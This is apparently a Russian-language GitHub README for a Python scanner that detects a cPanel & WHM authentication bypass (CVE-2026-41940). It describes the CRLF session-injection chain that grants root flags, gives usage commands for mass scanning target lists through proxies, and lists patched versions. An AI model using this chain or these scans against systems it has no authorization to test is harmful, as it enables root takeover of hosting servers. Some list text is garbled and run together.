
Сканер обхода аутентификации cPanel и WHM (CVE-2026-41940), который обнаруживает уязвимые версии через CRLF-инъекцию и манипуляцию сессиями, с поддержкой многопоточности и прокси.
CVE-2026-41940 cPanel & WHM Authentication Bypass Scanner
Данный инструмент предназначен исключительно для авторизованного тестирования безопасности и образовательных целей. Пользователь обязан соблюдать местные законы и нормативные акты. Сканирование неавторизованных систем строго запрещено. Автор не несёт ответственности за любое неправомерное использование.
| Параметр | Детали |
|---|
| CVE ID | CVE-2026-41940 |
| Название уязвимости | cPanel & WHM Session File CRLF Injection |
| Уровень опасности | 🔴 CRITICAL (CVSS 9.8) |
| Затронутые версии | cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5 |
| Тип уязвимости | Обход аутентификации → Получение прав root |
| Сложность эксплуатации | Низкая |
В cPanel & WHM существует логическая ошибка при обработке файлов сессий:
saveSession() вызывает filter_sessiondata() только после записи файла сессииAuthorization: Basic, содержащий CRLF-инъекциюhasroot=1, tfa_verified=1 и другие✅ Точное обнаружение — строго воспроизводит оригинальную цепочку эксплуатации
✅ Без зависимостей — использует только стандартную библиотеку Python
✅ Многопоточность — поддержка массового сканирования
✅ Поддержка прокси — совместимость с Burp Suite/Owasp ZAP
✅ Умный парсинг — автоматическое дополнение протокола и порта
✅ Цветной вывод — результаты об уязвимости выделяются красным
[1] POST /login/?login_only=1 → получение предварительной сессии
[2] GET / + CRLF-инъекция → загрязнение файла сессии
[3] GET /scripts2/listaccts → запуск обновления кэша
[4] GET /cpsess/token/json-api/version → проверка прав root
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py
# Автодополнение https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087
# Указание полного URL
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087
# Чтение целей из файла
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20
# Формат targets.txt:
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087
# Использование HTTP-прокси
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080
# Массовое сканирование через прокси
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5
| Параметр | Описание | Пример |
|---|---|---|
-u, --url | Одиночная цель | -u 1.2.3.4:2087 |
-f, --file | Файл со списком целей | -f targets.txt |
-t, --threads | Количество потоков (по умолчанию 10) | -t 20 |
--timeout | Время ожидания (по умолчанию 10 секунд) | --timeout 15 |
--proxy | HTTP/HTTPS прокси | --proxy http://127.0.0.1:8080 |
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087

13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087
Скрипт подтверждает уязвимость по следующей логике:
whostmgrsession/cpsess{digit}/json-api/version возвращает 200 и содержит поле "version"⚠️ Примечание: некоторые цели могут возвращать 500/503 с сообщением "License", что также означает успешный обход аутентификации, но отсутствие коммерческой лицензии.
Немедленно обновитесь до следующих безопасных версий:
Временные меры по снижению риска:
/var/cpanel/sessions/Данный инструмент предназначен только для авторизованного тестирования безопасности и оборонительных исследований. Любое неавторизованное сканирование является незаконным, и ответственность за последствия несёт пользователь.
Поставьте ⭐ этому проекту, чтобы получать обновления новых инструментов безопасности!